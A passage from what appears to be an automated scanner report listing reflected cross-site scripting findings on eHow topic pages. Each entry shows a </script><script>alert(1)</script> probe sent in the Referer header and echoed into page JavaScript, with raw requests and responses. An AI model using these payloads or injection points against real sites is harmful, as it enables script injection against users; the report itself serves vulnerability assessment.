The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4311c</script><script>alert(1)</script>71d0e12f2ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_363_winter-sports.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4311c</script><script>alert(1)</script>71d0e12f2ce

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:47 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:47 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49491

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Hit the Slopes for Winter Fitness - Downhill sk
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "4311c</script><script>alert(1)</script>71d0e12f2ce";

       </script>
...[SNIP]...

4.674. http://www.ehow.com/topic_3818_flu-guide.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3818_flu-guide.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90e55</script><script>alert(1)</script>2feace9df29 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_3818_flu-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=90e55</script><script>alert(1)</script>2feace9df29

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3818; expires=Thu, 02-Feb-2012 15:17:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43794

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Flu Guide | eHow.com
</title>
       <meta charset
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "90e55</script><script>alert(1)</script>2feace9df29";

       </script>
...[SNIP]...

4.675. http://www.ehow.com/topic_3990_home-security-systems-guide.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3990_home-security-systems-guide.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fca</script><script>alert(1)</script>fc7810aa163 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_3990_home-security-systems-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=55fca</script><script>alert(1)</script>fc7810aa163

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3990; expires=Thu, 02-Feb-2012 15:16:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44535

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Security Systems Guide | eHow.com
</title
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "55fca</script><script>alert(1)</script>fc7810aa163";

       </script>
...[SNIP]...

4.676. http://www.ehow.com/topic_401_home-alarms.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_401_home-alarms.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a5c9</script><script>alert(1)</script>35bc6437695 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_401_home-alarms.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7a5c9</script><script>alert(1)</script>35bc6437695

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=401; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51358

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Alarms - Home Alarm Systems | eHow.com
</
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "7a5c9</script><script>alert(1)</script>35bc6437695";

       </script>
...[SNIP]...

4.677. http://www.ehow.com/topic_4028_preparing-flu-season.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4028_preparing-flu-season.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b94</script><script>alert(1)</script>5e5d8da7a42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_4028_preparing-flu-season.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=50b94</script><script>alert(1)</script>5e5d8da7a42

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4028; expires=Thu, 02-Feb-2012 15:17:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42457

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Preparing for Flu Season | eHow.com
</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "50b94</script><script>alert(1)</script>5e5d8da7a42";

       </script>
...[SNIP]...

4.678. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4127_home-alarm-system-guide.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f21b</script><script>alert(1)</script>3693e48b6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_4127_home-alarm-system-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9f21b</script><script>alert(1)</script>3693e48b6e0

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4127; expires=Thu, 02-Feb-2012 15:16:37 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41825

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Alarm System Guide | eHow.com
</title>

...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "9f21b</script><script>alert(1)</script>3693e48b6e0";

       </script>
...[SNIP]...

4.679. http://www.ehow.com/topic_429_all-flu.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_429_all-flu.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0ca6</script><script>alert(1)</script>581ac46251c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_429_all-flu.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f0ca6</script><script>alert(1)</script>581ac46251c

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=429; expires=Thu, 02-Feb-2012 15:17:10 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44872

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
All About the Flu - Avoid the Flu | eHow.com
<
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f0ca6</script><script>alert(1)</script>581ac46251c";

       </script>
...[SNIP]...

4.680. http://www.ehow.com/topic_4989_photo-sharing-101.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4989_photo-sharing-101.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee024</script><script>alert(1)</script>fab642986c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_4989_photo-sharing-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ee024</script><script>alert(1)</script>fab642986c6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4989; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43021

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Photo Sharing 101 | eHow.com
</title>
       <meta
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "ee024</script><script>alert(1)</script>fab642986c6";

       </script>
...[SNIP]...

4.681. http://www.ehow.com/topic_49_treating-colds-flus.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_49_treating-colds-flus.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f643</script><script>alert(1)</script>ab7ae63df3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_49_treating-colds-flus.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5f643</script><script>alert(1)</script>ab7ae63df3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=49; expires=Thu, 02-Feb-2012 15:17:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37785

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Treat Colds and Flus - Treating Colds and Flus
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "5f643</script><script>alert(1)</script>ab7ae63df3";

       </script>
...[SNIP]...

4.682. http://www.ehow.com/topic_5023_jog-lose-weight.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_5023_jog-lose-weight.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 964df</script><script>alert(1)</script>ee96ee1016b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_5023_jog-lose-weight.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=964df</script><script>alert(1)</script>ee96ee1016b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=5023; expires=Thu, 02-Feb-2012 15:16:57 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43619

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Jog & Lose Weight | eHow.com
</title>
       <meta
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "964df</script><script>alert(1)</script>ee96ee1016b";

       </script>
...[SNIP]...

4.683. http://www.ehow.com/topic_689_black-white-photos.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_689_black-white-photos.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c3e0</script><script>alert(1)</script>94ff7919eca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_689_black-white-photos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3c3e0</script><script>alert(1)</script>94ff7919eca

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53252

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Take Black and White Photos - Taking Black and
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "3c3e0</script><script>alert(1)</script>94ff7919eca";

       </script>
...[SNIP]...

4.684. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_745_capture-enduring-wedding-photos.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3bef</script><script>alert(1)</script>29fd0f6f1e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_745_capture-enduring-wedding-photos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d3bef</script><script>alert(1)</script>29fd0f6f1e2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=745; expires=Thu, 02-Feb-2012 15:16:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39818

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Capture Enduring Wedding Photos - About Wedding
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "d3bef</script><script>alert(1)</script>29fd0f6f1e2";

       </script>
...[SNIP]...

4.685. http://www.ehow.com/topic_7853_floor-fountains-guide.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7853_floor-fountains-guide.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a28</script><script>alert(1)</script>52e623cc62d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /topic_7853_floor-fountains-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=99a28</script><script>alert(1)</script>52e623cc62d

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7853; expires=Thu, 02-Feb-2012 15:16:34 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40979

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Floor Fountains Guide | eHow.com
</title>
       <
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "99a28</script><script>alert(1)</script>52e623cc62d";

       </script>
...[SNIP]...

4.686. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7992_floor-water-fountains-101.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14171</script><script>alert(1)</script>ec64a979418 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

